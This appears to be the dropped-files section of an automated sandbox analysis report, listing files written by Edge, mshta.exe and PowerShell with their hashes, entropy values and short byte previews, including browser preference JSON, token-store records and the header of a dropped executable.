                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                  Entropy (8bit):6.0898099391956055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWhdi1zNtPM9kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynDakzItSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:20C795342913839527D56EAFDBDCDF7C
                                                                                                                                                                                                                  SHA1:7C35DD4059D2B95B9C0E8B59DB276872D25EEC57
                                                                                                                                                                                                                  SHA-256:4C2D6DD186E270408481E332DEBD118038C3798FE780027CBA8740272F574238
                                                                                                                                                                                                                  SHA-512:93E4881DA8E806B32DDC55B0FC7EF3F808270BC9BEF69BBD779BE9E3E0EB21576EF5BD4ED15FB3C89F8A063D3A49C63A34EA4D7A2CD27F351C1895A3BA2476AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                  MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                  SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                  SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                  SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):46221
                                                                                                                                                                                                                  Entropy (8bit):6.087407659678087
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:LMkbJrT8IeQc5LKWJfi1zNtecSxiYCOgQLXxYPCionJDSgzMMd6qD47u30d:LMk1rT8HDK50XxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:6D363FA3E20B97CD07E14E2C30DBDAF0
                                                                                                                                                                                                                  SHA1:BED1F47FF7EDC5DC0949B2D77C8784AC82D2FF71
                                                                                                                                                                                                                  SHA-256:4BF562F38D66773BA187C72638CF4014EBC8E519B9BD3B39717DAA6EFCF1500F
                                                                                                                                                                                                                  SHA-512:E2E1F49856B26043C1855AD37AA8BC769E89D695E6C4339E88B847EEB21ED8C5770C583F716B7EB35D6E18FFB3E11538DD751D484943528B0B50DFE217CF544D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):46144
                                                                                                                                                                                                                  Entropy (8bit):6.087496528627283
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:7MkbJrT8IeQc5dKWJfi1zNtec/9xiYCOgQLXxYPCionJDSgzMMd6qD47u30d:7Mk1rT8H1K5/fXxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:B8860A7323053113633AFBCCD080CDDB
                                                                                                                                                                                                                  SHA1:E41C368C7554326AF78EF642833F7A57F447CFF2
                                                                                                                                                                                                                  SHA-256:9F1C3A85BED0838A7348D3B1DED5A4085D2DCE65E52EF366E1878C38F0E4CCCD
                                                                                                                                                                                                                  SHA-512:739CE6BBE021A008DF01086EAE7329B3B207FB659005C603F74B242F6C0F6B315458E78065B06B3378F429CB933EA2B3E2E748D599EBCFE659D74C00326D4F28
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44902
                                                                                                                                                                                                                  Entropy (8bit):6.095693446140294
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWDki1zNtec/NEiBPbsKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn6/EKtSmd6qE7lFoC
                                                                                                                                                                                                                  MD5:D9A783347854BBBC83FB17CCD0CE058F
                                                                                                                                                                                                                  SHA1:2B5962FA6D58442F331DCACFC974AAB9DDEDBE83
                                                                                                                                                                                                                  SHA-256:E422EC76BD2AE2869D9C56D807102B87AFA8D9E205DDCB92DBCFD673EE204009
                                                                                                                                                                                                                  SHA-512:CC845D0A8B54F4566C4578CF35EE060062DBCCFEA11C06BEA8B83F9D866D5305315A7F445A93CA49411052576EF1F8D4F1D7CA3657C893F99B9A2C273343267E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):46221
                                                                                                                                                                                                                  Entropy (8bit):6.087409495185179
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:LMkbJrT8IeQc5L9WJfi1zNtecSxiYCOgQLXxYPCionJDSgzMMd6qD47u30d:LMk1rT8HD950XxWFontSmd6qE7/
                                                                                                                                                                                                                  MD5:5C6031A7DA7D1F6F7F8E6A1DF889BF27
                                                                                                                                                                                                                  SHA1:8C7509EC5461AFB3ADAB4696C9A742C389ACDC5E
                                                                                                                                                                                                                  SHA-256:507A1386C884C613B052F77D7039D51BDD2E5764B3239342993108A938C2E07C
                                                                                                                                                                                                                  SHA-512:C85CB10112CEAE78D31DEEDCBAC45A7664ADB5F5F024180CFE43DCD8696F2BAF8E72390E81A926EBF6588F53FA411FCEEB1AC89FCC305297708AF8A306100C35
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379025969491138","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734552373"},"domain_actions_config":"
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                  Entropy (8bit):3.8435318066029853
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxvxl9Il8utwCnGE29cHPJX0L9suPN0pd1rc:mGYUCnGE29yPMyi0K
                                                                                                                                                                                                                  MD5:1AB56809AD74D0B130D2118011E6D5FD
                                                                                                                                                                                                                  SHA1:967CAB8E2A865728D9AE8DF581B5696E0E2FB5BC
                                                                                                                                                                                                                  SHA-256:F4EDFAE6CFD19E17F6BC03391630A46BE7A993C77135FDA57C033C82FBFCA1E7
                                                                                                                                                                                                                  SHA-512:8EB74C7C6F26543B5A7A8A243249C8F543DFC9B6EB4B9E8B4F75F6CF1E6831CC9FB378437202650F8970BF11E75A0989B35FCBA39333E60764BDB8D2819E33FD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.J.B.h.q.5.B.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.s.A.c.C.G.v.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                  Entropy (8bit):3.99940769846296
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:5YDimatepQlrb/ilqwhFX1ytI4obCAMkBzFg8cJk9V:5g07lGqyVQK4ouAMcRqy
                                                                                                                                                                                                                  MD5:BB5B295380013A8C84DDE0BB53421143
                                                                                                                                                                                                                  SHA1:073C40004E5951420F09DF5D6687A74BDF20A11D
                                                                                                                                                                                                                  SHA-256:3E1DC0C741348860E4F2656F2DF0F319DBB9EACD751086CFB61930C3C3A40757
                                                                                                                                                                                                                  SHA-512:A59C24F2C4EA5C8D09341FDA1149F6C4231C5B1BA0E993D50A7BAD5630B3F886597495D6E9707C2742FFF7DD0B0756235AE040925BD6012A9CF5A20E46285436
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".c.H.i.i.k.I.h.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.s.A.c.C.G.v.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                  Entropy (8bit):3.8847498701323295
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xmxl9Il8urlAMNnkKPV3AckTLzL2OslWGmEd/vc:aMY3AMa+A7LfcgGQ
                                                                                                                                                                                                                  MD5:CE1B7DA2E0CCB00E6116A5C90F073C92
                                                                                                                                                                                                                  SHA1:3CB1940B2BD3487356A42EFC31B38162F46FCCC7
                                                                                                                                                                                                                  SHA-256:6775FCC9CABB71DD5851B4BA3862963E64FF82721291A7575861FACC0710CA85
                                                                                                                                                                                                                  SHA-512:D6EC3359D5B757AE5B98FD14925F60F70F4F80F68DE48BEE6447B203D87DF4DCA0C1124AC4274718340456267F901B1E7680C286B80F8727E0B47DE83DCB92D5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.z.c.B.w.V.l.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.s.A.c.C.G.v.
                                                                                                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):78474
                                                                                                                                                                                                                  Entropy (8bit):5.040626159678465
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:fsnZcnsXsnZcns0a6hy5snZcnsZCsnZcns:EZcbZcI6hyaZcCZc
                                                                                                                                                                                                                  MD5:E61B84E79E13C82061BAFDDD6605A67C
                                                                                                                                                                                                                  SHA1:65838D7900016408A9BEA470C6B483662CED2B7D
                                                                                                                                                                                                                  SHA-256:E414E964D0DCA9F1C045B9C6561B8085681761E8039056266E31E74A39B4DB4D
                                                                                                                                                                                                                  SHA-512:6A9CBF4205A5DCE13B6B7E99918C3F38542F8D68E196144F109918FAC238188A5F6C50D8AA36C65B62CAA48EB7FD9ED6219E3CB7D572232B0723CF6C73D09EF2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..W..W..C...V..C...U..C...C..C...P..W..s..C...V..C.|.V..C...V..RichW..........................PE..L...C.05............................@........ ....@..........................`......._....@...... ...........................0..P....@.......................P..@.......T............................................0...............................text...t........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..@....P.......&..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:@...e...........................................................
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1200x800, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):163840
                                                                                                                                                                                                                  Entropy (8bit):7.998819356575957
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:3072:H7Uxsy3eSeT4buEoFmO7f4duw1G4J3ZEssmwDLwUeiwaODY:H7byuSeTYCXQdDhwDL3NLOs
                                                                                                                                                                                                                  MD5:0CECA59F492AF57C4F259F23B61A5DE8
                                                                                                                                                                                                                  SHA1:31AAF693A5EBFA6776D174CA8317F4AE3B962C5D
                                                                                                                                                                                                                  SHA-256:9FCE36F9079249E80B733AA5C9180F024027C5774CA55E89742A2CDBF88CFAE1
                                                                                                                                                                                                                  SHA-512:4796A025492188D74D93335DCCE299EB2F205344A82266B7A9EF7F29D797CFB84E024304730BEEEFAD22E7980943D98567B0FFA182E5B626D8C39712C043A711
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
